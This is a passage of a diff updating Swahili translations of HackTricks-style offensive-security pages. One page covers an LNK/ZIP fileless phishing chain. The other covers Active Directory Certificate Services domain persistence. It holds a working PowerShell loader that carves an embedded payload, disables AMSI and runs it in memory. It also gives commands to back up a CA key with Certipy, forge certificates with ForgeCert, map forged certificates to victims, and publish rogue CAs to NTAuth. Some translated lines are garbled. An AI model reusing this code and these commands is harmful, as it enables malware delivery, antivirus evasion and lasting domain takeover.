+Kuna njia kadhaa za **kulazimisha NTLM authentication "remotely"**, kwa mfano, unaweza kuongeza **picha zisizoonekana** kwenye barua pepe au HTML ambazo mtumiaji ataziingia (hata HTTP MitM?). Au mtume mwathiriwa **anuani ya faili** ambayo itawasha **authentication** kwa kufungua folda tu.
 
-**Angalia mawazo haya na mengine kwenye kurasa zifuatazo:**
+**Angalia mawazo haya na zaidi katika kurasa zifuatazo:**
 
 
 {{#ref}}
@@ -156,24 +156,24 @@ Kuna njia kadhaa za **kulazimisha NTLM authentication "kwa mbali"**, kwa mfano,
 
 ### NTLM Relay
 
-Usisahau kuwa hutaweza tu kuiba hash au authentication lakini pia **kutekeleza NTLM relay attacks**:
+Usisahau kwamba huwezi kuiba tu hash au authentication, bali pia **perform NTLM relay attacks**:
 
 - [**NTLM Relay attacks**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack)
 - [**AD CS ESC8 (NTLM relay to certificates)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8)
 
 ## LNK Loaders + ZIP-Embedded Payloads (fileless chain)
 
-Kampeni zenye ufanisi mkubwa huzalisha ZIP inayojumuisha nyaraka mbili halali za kuibua (PDF/DOCX) na .lnk hatarishi. Njia ni kwamba loader halisi ya PowerShell imehifadhiwa ndani ya raw bytes za ZIP baada ya alama ya kipekee, na .lnk inachonga na kuendesha yote ndani ya kumbukumbu.
+Kampeni zenye ufanisi mkubwa hutuma ZIP inayojumuisha hati mbili halali za kuwadanganya (PDF/DOCX) na .lnk yenye madhara. Njia ni kwamba PowerShell loader mwenyewe imehifadhiwa ndani ya raw bytes za ZIP baada ya marker maalum, na .lnk huichonga na kuiendesha yote ndani ya memory.
 
 Mtiririko wa kawaida unaotekelezwa na .lnk PowerShell one-liner:
 
-1) Tafuta ZIP asili katika njia za kawaida: Desktop, Downloads, Documents, %TEMP%, %ProgramData%, na mzazi wa current working directory.  
-2) Soma bytes za ZIP na tafuta marker iliyowekwa kimagurudumu (mfano, xFIQCV). Kila kitu baada ya marker ni PowerShell payload iliyowekwa.  
-3) Nakili ZIP hadi %ProgramData%, ifungue hapo, na fungua decoy .docx ili ionekane halali.  
-4) Kuepuka AMSI kwa mchakato wa sasa: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true  
-5) Deobfuscate hatua inayofuata (mfano, ondoa herufi zote #) na itekeleze ndani ya kumbukumbu.
+1) Tafuta ZIP asili katika njia za kawaida: Desktop, Downloads, Documents, %TEMP%, %ProgramData%, na parent ya current working directory.
+2) Soma bytes za ZIP na upate marker iliyowekwa (mfano, xFIQCV). Kila kitu kilicho baada ya marker ni PowerShell payload iliyowekwa.
+3) Nakili ZIP hadi %ProgramData%, extract hapo, na fungua decoy .docx ionekane halali.
+4) Kwepa AMSI kwa process ya sasa: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
+5) Deobfuscate stage inayofuata (mfano, ondoa wote # characters) na uitekelleze ndani ya memory.
 
-Mfano wa skeleton ya PowerShell ili kuchonga na kuendesha hatua iliyowekwa:
+Example PowerShell skeleton to carve and run the embedded stage:
 ```powershell
 $marker   = [Text.Encoding]::ASCII.GetBytes('xFIQCV')
 $paths    = @(
@@ -190,12 +190,12 @@ $code  = [Text.Encoding]::UTF8.GetString($stage) -replace '#',''
 [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
 Invoke-Expression $code
 ```
-Vidokezo
-- Delivery often abuses reputable PaaS subdomains (e.g., *.herokuapp.com) and may gate payloads (serve benign ZIPs based on IP/UA).
-- Sehemu inayofuata mara nyingi hu-decrypt base64/XOR shellcode na kuitekeleza kupitia Reflection.Emit + VirtualAlloc ili kupunguza artifacts za diski.
+Notes
+- Usambazaji mara nyingi hutumia vibaya subdomains za PaaS zenye sifa nzuri (mfano, *.herokuapp.com) na inaweza kuweka vizuizi kwa payloads (kutoa ZIP zisizo hatari kulingana na IP/UA).
+- Hatua inayofuata mara nyingi hu-decrypt base64/XOR shellcode na kuitekeleza kupitia Reflection.Emit + VirtualAlloc ili kupunguza alama kwenye diski.
 
-Persistence iliyotumika katika mnyororo huo huo
-- COM TypeLib hijacking ya Microsoft Web Browser control ili IE/Explorer au app yoyote inayoi-embed irejeshe payload moja kwa moja. See details and ready-to-use commands here:
+Persistence used in the same chain
+- COM TypeLib hijacking of the Microsoft Web Browser control so that IE/Explorer or any app embedding it re-launches the payload automatically. See details and ready-to-use commands here:
 
 {{#ref}}
 ../../windows-hardening/windows-local-privilege-escalation/com-hijacking.md
@@ -207,7 +207,16 @@ Hunting/IOCs
 - AMSI tampering via [System.Management.Automation.AmsiUtils]::amsiInitFailed.
 - Long-running business threads ending with links hosted under trusted PaaS domains.
 
-## References
+## Windows files to steal NTLM hashes
+
+Angalia ukurasa kuhusu **places to steal NTLM creds**:
+
+{{#ref}}
+../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md
+{{#endref}}
+
+
+## Marejeo
 
 - [Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/)
 - [Hijack the TypeLib – New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)

src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md

@@ -2,26 +2,26 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-**Hii ni muhtasari wa mbinu za domain persistence zilizosambazwa katika [https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)**. Angalia kwa maelezo zaidi.
+**Huu ni muhtasari wa mbinu za domain persistence zilizoshirikiwa katika [https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)**. Angalia kwa maelezo zaidi.
 
 ## Forging Certificates with Stolen CA Certificates - DPERSIST1
 
 How can you tell that a certificate is a CA certificate?
 
-Inaweza kubainika kuwa certificate ni CA certificate ikiwa masharti kadhaa yanatimiza:
+Inaweza kubainika kwamba certificate ni certificate ya CA ikiwa masharti kadhaa yamekidhiwa:
 
-- Certificate imehifadhiwa kwenye CA server, na private key yake imehifadhiwa kwa DPAPI ya mashine, au kwa hardware kama TPM/HSM ikiwa sistema ya uendeshaji inaunga mkono.
-- Sehemu za Issuer na Subject za certificate zinaendana na distinguished name ya CA.
-- Extension ya "CA Version" ipo tu katika CA certificates.
-- Certificate haijumuishi Extended Key Usage (EKU) fields.
+- The certificate is stored on the CA server, with its private key secured by the machine's DPAPI, or by hardware such as a TPM/HSM if the operating system supports it.
+- Both the Issuer and Subject fields of the certificate match the distinguished name of the CA.
+- A "CA Version" extension is present in the CA certificates exclusively.
+- The certificate lacks Extended Key Usage (EKU) fields.
 
-Ili kutoa private key ya certificate hii, zana certsrv.msc kwenye CA server ndiyo njia inayotambulika kupitia GUI iliyojengwa ndani. Hata hivyo, certificate hii haijatofautiana na nyingine zilizohifadhiwa ndani ya mfumo; kwa hivyo, mbinu kama [THEFT2 technique](certificate-theft.md#user-certificate-theft-via-dpapi-theft2) zinaweza kutumika kwa uondoaji.
+Ili kutoa private key ya certificate hii, zana certsrv.msc kwenye server ya CA ndiyo njia inayotumiwa kupitia GUI iliyojengwa. Hata hivyo, certificate hii haijatofautiana na zile nyingine zilizo kwenye mfumo; kwa hivyo, mbinu kama [THEFT2 technique](certificate-theft.md#user-certificate-theft-via-dpapi-theft2) zinaweza kutumika kwa ajili ya uondoaji.
 
 The certificate and private key can also be obtained using Certipy with the following command:
 ```bash
 certipy ca 'corp.local/administrator@ca.corp.local' -hashes :123123.. -backup
 ```
-Baada ya kupata cheti cha CA na ufunguo wake wa kibinafsi katika muundo wa `.pfx`, zana kama [ForgeCert](https://github.com/GhostPack/ForgeCert) zinaweza kutumika kuunda vyeti halali:
+Baada ya kupata cheti cha CA na ufunguo wake wa siri katika muundo wa `.pfx`, zana kama [ForgeCert](https://github.com/GhostPack/ForgeCert) zinaweza kutumika kutengeneza vyeti halali:
 ```bash
 # Generating a new certificate with ForgeCert
 ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123! --Subject "CN=User" --SubjectAltName localadmin@theshire.local --NewCertPath localadmin.pfx --NewCertPassword Password123!
@@ -36,19 +36,19 @@ Rubeus.exe asktgt /user:localdomain /certificate:C:\ForgeCert\localadmin.pfx /pa
 certipy auth -pfx administrator_forged.pfx -dc-ip 172.16.126.128
 ```
 > [!WARNING]
-> Mtumiaji aliyechaguliwa kwa udanganyifu wa vyeti lazima awe hai na aweze kujiuthibitisha katika Active Directory ili mchakato ufanikiwe. Kudanganya cheti kwa akaunti maalum kama krbtgt hakuwezi kufanya kazi.
+> Mtumiaji aliyechaguliwa kwa udanganyifu wa cheti lazima awe hai na awe na uwezo wa kuthibitisha utambulisho katika Active Directory ili mchakato ufanikiwe. Kutengeneza cheti kwa akaunti maalum kama krbtgt haifai.
 
-Cheti hiki cha udanganyifu kitaendelea kuwa **halali** hadi tarehe ya mwisho iliyobainishwa na kwa muda **cheti cha root CA** kitakapoendelea kuwa halali (kwa kawaida kutoka miaka 5 hadi **miaka 10+**). Pia ni halali kwa ajili ya **mashine**, hivyo likiunganishwa na **S4U2Self**, mshambuliaji anaweza **kuendeleza persistence kwenye mashine yoyote ya domain** kwa muda wote cheti cha CA kitakapoendelea kuwa halali.\
-Zaidi ya hayo, **vyeti vilivyotengenezwa** kwa njia hii **haiwezi kufutwa** kwa kuwa CA haijui kuhusu vyeti hivyo.
+Cheti kilichofungwa hiki kitatumika **hadi tarehe ya mwisho** iliyotajwa na kwa **muda ambao cheti cha root CA kitakavyokuwa halali** (kawaida kutoka miaka 5 hadi **10+ years**). Pia kinatumika kwa **mashine**, hivyo ukichanganywa na **S4U2Self**, mshambuliaji anaweza **kutunza udumu kwenye mashine yoyote ya domain** kwa muda wote cheti cha CA kitakachokuwa halali.\  
+Zaidi ya hayo, **vyeti vinavyotengenezwa** kwa njia hii **haviwezi kukataliwa** kwa sababu CA haijui kuhusu hivyo.
 
-### Kufanya kazi chini ya Utekelezaji Mkali wa Ulinganifu wa Vyeti (2025+)
+### Kufanya kazi chini ya utekelezaji mkali wa ramani za vyeti (2025+)
 
-Tangu Februari 11, 2025 (baada ya rollout ya KB5014754), domain controllers kwa chaguo-msingi ziko kwenye **Full Enforcement** kwa certificate mappings. Kwa vitendo, hili lina maana vyeti vyako vilivyoofdanganywa vinapaswa ama:
+Tangu February 11, 2025 (baada ya kuenezwa kwa KB5014754), domain controllers kwa chaguo-msingi zimeweka **Full Enforcement** kwa certificate mappings. Kivitendo hili linamaanisha vyeti vyako vya uongo lazima vitokee kwa mojawapo ya:
 
-- Kuwa na uunganisho thabiti na akaunti lengwa (kwa mfano, upanuzaji wa usalama wa SID), au
-- Kuambatanishwa na ulinganifu thabiti, wazi kwenye attribute `altSecurityIdentities` ya objekti lengwa.
+- Kuwa na uhusiano thabiti na akaunti lengwa (kwa mfano, extension ya usalama ya SID), au
+- Kuambatanishwa na ramani thabiti, wazi kwenye sifa ya kitu lengwa `altSecurityIdentities`.
 
-Njia ya kuaminika kwa ajili ya persistence ni kutengeneza cheti cha udanganyifu kilichounganishwa na Enterprise CA iliyotekwa kisha kuongeza ulinganifu thabiti, wazi kwa principal wa mwathirika:
+Njia ya kuaminika kwa udumu ni kutengeneza cheti bandia kilichounganishwa na Enterprise CA iliyoibwa kisha kuongeza ramani imara, wazi kwenye victim principal:
 ```powershell
 # Example: map a forged cert to a target account using Issuer+Serial (strong mapping)
 $Issuer  = 'DC=corp,DC=local,CN=CORP-DC-CA'           # reverse DN format expected by AD
@@ -56,15 +56,16 @@ $SerialR = '1200000000AC11000000002B'                  # serial in reversed byte
 $Map     = "X509:<I>$Issuer<SR>$SerialR"             # strong mapping format
 Set-ADUser -Identity 'victim' -Add @{altSecurityIdentities=$Map}
 ```
-Notes
-- Ikiwa unaweza kutengeneza vyeti bandia vinavyojumuisha nyongeza ya usalama ya SID, vitafuatana kwa njia ya moja kwa moja hata chini ya Full Enforcement. Vinginevyo, pendelea mapangilio wazi na yenye nguvu. Angalia [account-persistence](account-persistence.md) kwa maelezo zaidi juu ya mapangilio ya wazi.
-- Kufutwa hakusaidii watetezi hapa: vyeti bandia havijulikani katika hifadhidata ya CA na kwa hivyo haviwezi kufutwa.
+Vidokezo
+- If you can craft forged certificates that include the SID security extension, those will map implicitly even under Full Enforcement. Otherwise, prefer explicit strong mappings. See
+[account-persistence](account-persistence.md) for more on explicit mappings.
+- Revocation haimsaidii watetezi hapa: vyeti bandia havijulikani kwenye hifadhidata ya CA na kwa hivyo haviwezi kukataliwa.
 
-## Kuamini Vyeti vya CA Visivyo Rasmi - DPERSIST2
+## Kuamini Rogue CA Certificates - DPERSIST2
 
-Kiobjekti cha `NTAuthCertificates` kimefafanuliwa kuhusisha cheti kimoja au zaidi za **CA certificates** ndani ya sifa yake ya `cacertificate`, ambazo Active Directory (AD) hutumia. Mchakato wa uhakiki unaofanywa na **domain controller** unahusisha kuangalia kiobjekti cha `NTAuthCertificates` kwa kipengele kinacholingana na **CA specified** katika uwanja wa Issuer wa **certificate** inayothibitisha. Uthibitishaji utaendelea ikiwa mechi itapatikana.
+The `NTAuthCertificates` object is defined to contain one or more **CA certificates** within its `cacertificate` attribute, which Active Directory (AD) utilizes. The verification process by the **domain controller** involves checking the `NTAuthCertificates` object for an entry matching the **CA specified** in the Issuer field of the authenticating **certificate**. Authentication proceeds if a match is found.
 
-Cheti cha CA chenye saini ya mwenyewe kinaweza kuongezwa kwenye kiobjekti cha `NTAuthCertificates` na mshambulizi, mradi awe na udhibiti wa kiobjekti hiki cha AD. Kwa kawaida, ni wanachama wa kikundi cha **Enterprise Admin**, pamoja na **Domain Admins** au **Administrators** katika **forest root’s domain**, wanaoruhusiwa kurekebisha kiobjekti hiki. Wanaweza kuhariri kiobjekti cha `NTAuthCertificates` kwa kutumia `certutil.exe` na amri `certutil.exe -dspublish -f C:\Temp\CERT.crt NTAuthCA`, au kwa kutumia [**PKI Health Tool**](https://docs.microsoft.com/en-us/troubleshoot/windows-server/windows-security/import-third-party-ca-to-enterprise-ntauth-store#method-1---import-a-certificate-by-using-the-pki-health-tool).
+A self-signed CA certificate can be added to the `NTAuthCertificates` object by an attacker, provided they have control over this AD object. Normally, only members of the **Enterprise Admin** group, along with **Domain Admins** or **Administrators** in the **forest root’s domain**, are granted permission to modify this object. They can edit the `NTAuthCertificates` object using `certutil.exe` with the command `certutil.exe -dspublish -f C:\Temp\CERT.crt NTAuthCA`, or by employing the [**PKI Health Tool**](https://docs.microsoft.com/en-us/troubleshoot/windows-server/windows-security/import-third-party-ca-to-enterprise-ntauth-store#method-1---import-a-certificate-by-using-the-pki-health-tool).
 
 Additional helpful commands for this technique:
 ```bash
@@ -77,32 +78,32 @@ certutil -enterprise -delstore NTAuth <Thumbprint>
 certutil -dspublish -f C:\Temp\CERT.crt RootCA          # CN=Certification Authorities
 certutil -dspublish -f C:\Temp\CERT.crt CA               # CN=AIA
 ```
-Uwezo huu una umuhimu maalum unapotumika pamoja na mbinu iliyotajwa hapo awali inayohusisha ForgeCert kutengeneza vyeti kwa njia ya dinamiki.
+Uwezo huu una umuhimu hasa inapochanganywa na mbinu iliyotajwa hapo awali inayotumia ForgeCert kuunda vyeti kwa wakati wa utekelezaji.
 
-> Post-2025 mapping considerations: placing a rogue CA in NTAuth only establishes trust in the issuing CA. To use leaf certificates for logon when DCs are in **Full Enforcement**, the leaf must either contain the SID security extension or there must be a strong explicit mapping on the target object (for example, Issuer+Serial in `altSecurityIdentities`). See {{#ref}}account-persistence.md{{#endref}}.
+> Mambo ya kuzingatia baada ya 2025 kuhusu ulinganishaji: kuweka CA ya kivurugo kwenye NTAuth kunaunda tu uaminifu kwa CA inayotolewa. Ili kutumia vyeti vya leaf kwa kuingia wakati DCs ziko katika **Full Enforcement**, leaf lazima iwe na rozsion ya usalama ya SID au lazima kuwe na ulinganishaji thabiti wazi kwenye kitu lengwa (kwa mfano, Issuer+Serial katika `altSecurityIdentities`). Angalia {{#ref}}account-persistence.md{{#endref}}.
 
 ## Usanidi Mbaya - DPERSIST3
 
-Fursa za **persistence** kupitia **urekebishaji wa security descriptor wa vipengele vya AD CS** ni nyingi. Marekebisho yaliyotajwa katika sehemu ya "[Domain Escalation](domain-escalation.md)" yanaweza kutekelezwa kwa nia mbaya na mdhambi mwenye upatikanaji uliopandishwa cheo. Hii inajumuisha kuongeza "control rights" (mfano, WriteOwner/WriteDACL/etc.) kwa vipengele nyeti kama:
+Fursa za **persistence** kupitia **mabadiliko ya security descriptor ya vipengele vya AD CS** ni nyingi. Mabadiliko yaliyoelezwa katika sehemu ya "[Domain Escalation](domain-escalation.md)" yanaweza kutekelezwa kwa ubaya na mshambuliaji mwenye upatikanaji ulioboreshwa. Hii ni pamoja na kuongeza "control rights" (mf., WriteOwner/WriteDACL/etc.) kwa vipengele vitakavyokuwa na hatari kama:
 
-- The **CA server’s AD computer** object
-- The **CA server’s RPC/DCOM server**
-- Any **descendant AD object or container** in **`CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>`** (for instance, the Certificate Templates container, Certification Authorities container, the NTAuthCertificates object, etc.)
-- **AD groups delegated rights to control AD CS** by default or by the organization (such as the built-in Cert Publishers group and any of its members)
+- Objekti la **AD computer** la **CA server**
+- **CA server’s RPC/DCOM server**
+- Kila **objekti au kituzo cha jirani cha AD** katika **`CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>`** (kwa mfano, container ya Certificate Templates, container ya Certification Authorities, objektu ya NTAuthCertificates, nk.)
+- **AD groups zilizopewa haki za kudhibiti AD CS** kwa default au na shirika (kama group ya built-in Cert Publishers na wanachama wake wote)
 
-Mfano wa utekelezwaji wa uharifu ungehusisha mdhambi, aliye na **idhini za juu** ndani ya domain, kuongeza ruhusa ya **`WriteOwner`** kwenye template ya kawaida ya cheti ya **`User`**, akiwa yeye ndiye mhusika wa haki hiyo. Ili kuutumia huu, mdhambi atabadilisha kwanza umiliki wa template ya **`User`** kuwa yeye mwenyewe. Baadaye, **`mspki-certificate-name-flag`** itawekwa kuwa **1** kwenye template ili kuwezesha **`ENROLLEE_SUPPLIES_SUBJECT`**, ikimruhusu mtumiaji kutoa Subject Alternative Name katika ombi. Baadaye, mdhambi anaweza **kujisajili** kwa kutumia **template**, akichagua jina la **domain administrator** kama jina mbadala, na kutumia cheti kilichopatikana kwa uthibitisho kama DA.
+Mfano wa utekelezaji mbaya ungehusisha mshambuliaji ambaye ana **idhini iliyoongezwa** katika domain, kuongeza ruhusa ya **`WriteOwner`** kwenye template ya default **`User`**, huku mshambuliaji akiwa ndiye mtendaji wa haki hiyo. Ili kutumia hili, mshambuliaji angebadili umiliki wa template ya **`User`** kuwa wao wenyewe. Baada ya hapo, `mspki-certificate-name-flag` ingetengwa kuwa **1** kwenye template ili kuwezesha **`ENROLLEE_SUPPLIES_SUBJECT`**, kuruhusu mtumiaji kutoa Subject Alternative Name katika ombi. Ifuatayo, mshambuliaji angeweza **kuiandika** kwa kutumia **template**, akichagua jina la **domain administrator** kama jina mbadala, na kutumia cheti alichopata kwa uthibitishaji kama DA.
 
-Mipangilio ya vitendo wadukuzi wanaweza kuweka kwa kudumu ndani ya domain (angalia {{#ref}}domain-escalation.md{{#endref}} kwa maelezo kamili na utambuzi):
+Maboresho ya vitendo ambayo mashambulizi yanaweza kuweka kwa persistence ya muda mrefu katika domain (tazama {{#ref}}domain-escalation.md{{#endref}} kwa maelezo kamili na utambuzi):
 
-- CA policy flags that allow SAN from requesters (e.g., enabling `EDITF_ATTRIBUTESUBJECTALTNAME2`). This keeps ESC1-like paths exploitable.
-- Template DACL or settings that allow authentication-capable issuance (e.g., adding Client Authentication EKU, enabling `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`).
-- Controlling the `NTAuthCertificates` object or the CA containers to continuously re-introduce rogue issuers if defenders attempt cleanup.
+- Bendera za sera za CA zinazoruhusu SAN kutoka kwa waombaji (mf., kuwezesha `EDITF_ATTRIBUTESUBJECTALTNAME2`). Hii inahifadhi njia za aina ya ESC1 ziwe za kutumika.
+- DACL ya template au mipangilio inayoruhusu utoaji unaouwezesha uthibitishaji (mf., kuongeza Client Authentication EKU, kuwezesha `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`).
+- Kudhibiti objektu ya `NTAuthCertificates` au containers za CA ili kuendelea kuingiza tena watoleaji wa kivurugo ikiwa watetezi watajaribu kusafisha.
 
 > [!TIP]
-> In hardened environments after KB5014754, pairing these misconfigurations with explicit strong mappings (`altSecurityIdentities`) ensures your issued or forged certificates remain usable even when DCs enforce strong mapping.
+> Katika mazingira yaliyoimarishwa baada ya KB5014754, kupanganya misconfigurations hizi na ulinganishaji thabiti wazi (`altSecurityIdentities`) kunahakikisha vyeti ulivyovituma au vilivyofanywa kwa udukuzi vinaendelea kutumika hata wakati DCs zinapoiga ulinganishaji thabiti.
 
 ## References
 
-- Microsoft KB5014754 – Mabadiliko ya certificate-based authentication kwenye Windows domain controllers (ratiba ya utekelezaji na strong mappings). https://support.microsoft.com/en-au/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16
+- Microsoft KB5014754 – Mabadiliko ya uthibitishaji unaotegemea vyeti kwenye Windows domain controllers (muda wa utekelezaji na ulinganifu thabiti). https://support.microsoft.com/en-au/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16
 - Certipy – Command Reference and forge/auth usage. https://github.com/ly4k/Certipy/wiki/08-%E2%80%90-Command-Reference
 {{#include ../../../banners/hacktricks-training.md}}